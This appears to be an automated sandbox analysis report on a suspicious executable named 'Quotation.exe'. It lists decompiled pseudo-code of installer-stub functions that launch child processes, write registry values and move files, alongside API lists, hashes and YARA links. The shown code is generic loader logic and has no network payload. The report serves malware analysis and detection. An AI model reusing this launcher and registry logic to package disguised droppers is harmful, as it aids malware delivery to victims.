                                                • CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\Quotation.exe" ,00000000), ref: 00405589
                                                • CharNextA.USER32(00000000), ref: 0040558E
                                                • CharNextA.USER32(00000000), ref: 0040559D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: 1S@$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3213498283-2473310629
                                                • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                • Instruction ID: a38fbd83576ea772fbec08ada66f215e8512e3b4ef80e4756add6815f90ed6c2
                                                • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                • Instruction Fuzzy Hash: 24F0A791A14F217EEB3262644C44B6B5FEDDB95720F140477E241B61D5D3BC4C42CFAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404561, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 35%
                                                			E00404561(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E004059FD(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E004059FD(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E004059FD(_t34, 0, 0x42a8a0, 0x42a8a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x42a8a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a8a0);
			}













                                                0x00404569
                                                0x0040456d
                                                0x00404575
                                                0x00404578
                                                0x00404579
                                                0x0040457b
                                                0x0040457d
                                                0x00404580
                                                0x00404580
                                                0x00404587
                                                0x0040458d
                                                0x0040458d
                                                0x00404594
                                                0x0040459f
                                                0x004045a0
                                                0x004045a3
                                                0x004045a3
                                                0x004045b0
                                                0x004045bb
                                                0x004045be
                                                0x004045d0
                                                0x004045d7
                                                0x004045d8
                                                0x004045e7
                                                0x004045f7
                                                0x00404613

                                                APIs
                                                • lstrlenA.KERNEL32(0042A8A0,0042A8A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404481,000000DF,?,00000000,00000400), ref: 004045EF
                                                • wsprintfA.USER32 ref: 004045F7
                                                • SetDlgItemTextA.USER32 ref: 0040460A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
                                                • Instruction ID: a11c77c1d28780ca16a25841ba49bfe078be5d3d3c6fb1a2dd9ec20d76d43e14
                                                • Opcode Fuzzy Hash: 55c911bb95cf7588d6af741ae256193dafe342a2ef030f34ff05c61eeb47f464
                                                • Instruction Fuzzy Hash: 1B110473A001387BDB00666D9C46EAF365DCBC6334F14023BFA25F61D1E9788C1296A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401C19, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 54%
                                                			E00401C19(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A9A(0x33);
				 *(_t58 + 8) = E00402A9A(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405952(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405952(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A9A();
					_t30 = E00402A9A();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A7D();
					_t39 = E00402A7D();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x34) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x34));
					E00405939();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                0x00401c19
                                                0x00401c22
                                                0x00401c2e
                                                0x00401c31
                                                0x00401c3b
                                                0x00401c3b
                                                0x00401c3e
                                                0x00401c42
                                                0x00401c4c
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c53
                                                0x00401c55
                                                0x00401ca2
                                                0x00401ca4
                                                0x00401cad
                                                0x00401cb5
                                                0x00401cb8
                                                0x00401cb8
                                                0x00401cc1
                                                0x00000000
                                                0x00401c57
                                                0x00401c5e
                                                0x00401c60
                                                0x00401c68
                                                0x00401c6b
                                                0x00401c93
                                                0x00401cc7
                                                0x00401cc7
                                                0x00401c6d
                                                0x00401c7b
                                                0x00401c83
                                                0x00401c86
                                                0x00401c86
                                                0x00401c6b
                                                0x00401cca
                                                0x00401ccd
                                                0x00401cd3
                                                0x004028d7
                                                0x004028d7
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
                                                • SendMessageA.USER32 ref: 00401C93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
                                                • Instruction ID: 16c78498dd1c2a75f25d2486059e8ad8e4f8cfcc0dd16789622c6010fc6d5132
                                                • Opcode Fuzzy Hash: bdb3484cc01cc4fd924d1c2f7cd2782c3e3dde487251ead39a63a2e7085da7fd
                                                • Instruction Fuzzy Hash: 0321A171A44209BEEF01AFB0CD4AAED7FB1EF44304F10443AF501BA1E1D7B98A519B18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49synchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E00401E9C() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A9A(_t24);
				E00404D7E(0xffffffeb, _t13);
				_t15 = E00405263(_t28, "C:\\Users\\alfons\\AppData\\Local\\Temp");
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405D18(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x34) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405939(_t26,  *(_t31 - 0x34));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                0x00401ea2
                                                0x00401ea7
                                                0x00401eb2
                                                0x00401eb9
                                                0x00401ebc
                                                0x004026da
                                                0x00401ec2
                                                0x00401ec5
                                                0x00401ed6
                                                0x00401ed1
                                                0x00401ed1
                                                0x00401eeb
                                                0x00401ef4
                                                0x00401f04
                                                0x00401f06
                                                0x00401f06
                                                0x00401ef6
                                                0x00401efa
                                                0x00401efa
                                                0x00401ef4
                                                0x00401f0d
                                                0x00401f10
                                                0x00401f10
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                  • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,7519EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                  • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,7519EA30), ref: 00404DDA
                                                  • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E12
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E2C
                                                  • Part of subcall function 00404D7E: SendMessageA.USER32 ref: 00404E3A
                                                  • Part of subcall function 00405263: GetFileAttributesA.KERNEL32(?), ref: 00405276
                                                  • Part of subcall function 00405263: CreateProcessA.KERNEL32 ref: 0040529F
                                                  • Part of subcall function 00405263: CloseHandle.KERNEL32(?), ref: 004052AC
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                                • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                                • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 4003922372-1943935188
                                                • Opcode ID: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
                                                • Instruction ID: 5373abc2601613a98f28ad4f4965e42200fdcae42bb0af3ca7e989b3915abbb6
                                                • Opcode Fuzzy Hash: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
                                                • Instruction Fuzzy Hash: 7F018031904119EBCF12AFE1DD85A9E7672EF00355F20403BF201B61E1D3B94A419F9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405263, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405263(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x42c8a8->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x42c8a8,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                                0x0040526c
                                                0x00405276
                                                0x00405281
                                                0x00405287
                                                0x00405287
                                                0x0040529f
                                                0x004052a7
                                                0x004052ac
                                                0x00000000
                                                0x004052b2
                                                0x004052b6

                                                APIs
                                                • GetFileAttributesA.KERNEL32(?), ref: 00405276
                                                • CreateProcessA.KERNEL32 ref: 0040529F
                                                • CloseHandle.KERNEL32(?), ref: 004052AC
                                                Strings
                                                • Error launching installer, xrefs: 00405263
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AttributesCloseCreateFileHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 2000254098-66219284
                                                • Opcode ID: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
                                                • Instruction ID: 569e459230bed8030f36cb91adc98a8a2728fe2275d92c1c3a76062f46c74d15
                                                • Opcode Fuzzy Hash: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
                                                • Instruction Fuzzy Hash: 7AF01C70900209AFDB046FA4DC49AAF7B64FF04315B50862AFD25A52E0E739E5158F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004054E8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004054E8(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                0x004054e9
                                                0x00405500
                                                0x00405508
                                                0x00405508
                                                0x00405510

                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054EE
                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054F7
                                                • lstrcatA.KERNEL32(?,00409010), ref: 00405508
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004054E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-823278215
                                                • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                • Instruction ID: b17aae5b68b8bc80d4c61b0fd94ca46693d6836576485c9dca8ad087ab612ca9
                                                • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                • Instruction Fuzzy Hash: 7BD0A9A2609A70BAD20227599C05E8B2A18CF46320B040022F140B22D2C23C1D81DFEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a440 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a440, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t35 - 4);
				return 0;
			}










                                                0x00402387
                                                0x0040238c
                                                0x00402396
                                                0x004023a0
                                                0x004023a3
                                                0x004023b5
                                                0x004023bc
                                                0x004023c4
                                                0x004023d2
                                                0x004023d6
                                                0x004023e1
                                                0x004023e1
                                                0x004023e5
                                                0x004023e9
                                                0x004023ef
                                                0x004023f4
                                                0x004023f4
                                                0x004023f8
                                                0x00402404
                                                0x00402404
                                                0x0040241d
                                                0x0040241f
                                                0x0040241f
                                                0x00402422
                                                0x004024fb
                                                0x004024fb
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                • lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                • RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                • RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
                                                • Instruction ID: 1c94cea9ba90df93ca58bd4285a9e0d6cf73b35acad62412febfb939eac80851
                                                • Opcode Fuzzy Hash: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
                                                • Instruction Fuzzy Hash: 1111AFB1E00208BFEB10AFA5DE4DEAF767CEB50758F10003AF904B61C1D6B85D019A69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E00405939(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E00405939(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                0x00401f50
                                                0x00401f53
                                                0x00401f5b
                                                0x00401f60
                                                0x00401f65
                                                0x00401f69
                                                0x00401f6c
                                                0x00401f6e
                                                0x00401f75
                                                0x00401f7e
                                                0x00401f86
                                                0x00401f89
                                                0x00401f9e
                                                0x00401fa4
                                                0x00401fb7
                                                0x00401fc0
                                                0x00401fcc
                                                0x00401fd1
                                                0x00401fd1
                                                0x00401fb7
                                                0x00401fd4
                                                0x00401be1
                                                0x00401be1
                                                0x00401f89
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                  • Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.241753513.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.241750332.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241758255.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241763299.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241768639.0000000000414000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241776027.0000000000420000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241783328.000000000042C000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241788000.0000000000435000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.241791711.0000000000438000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
                                                • Instruction ID: e4d099bb47c36cba02d0065e41ba721c83b3d665ff7f953a0667131b869b9819
                                                • Opcode Fuzzy Hash: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
                                                • Instruction Fuzzy Hash: 1F1116B1900108EEDB01DFE5D9859EEBBB9EF04344F20803AF501F61A1D7789A54DB28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059FD(_t33, 0x40a440, _t38, 0x40a440, 0xfffffff8);
				lstrcatA(0x40a440, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a440;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D7E(_t33, 0x40a440);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D7E(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                0x004021fc
                                                0x00402200
                                                0x00402208
                                                0x0040220e
                                                0x00402211
                                                0x0040221e
                                                0x0040222f
                                                0x00402233
                                                0x0040223a
                                                0x00402243
                                                0x0040224b
                                                0x0040224e
                                                0x00402251
                                                0x00402255
                                                0x00402266
                                                0x0040226f
                                                0x004026da
                                                0x004026da
                                                0x00402932
                                                0x0040293e

                                                APIs
                                                • lstrlenA.KERNEL32 ref: 00402218
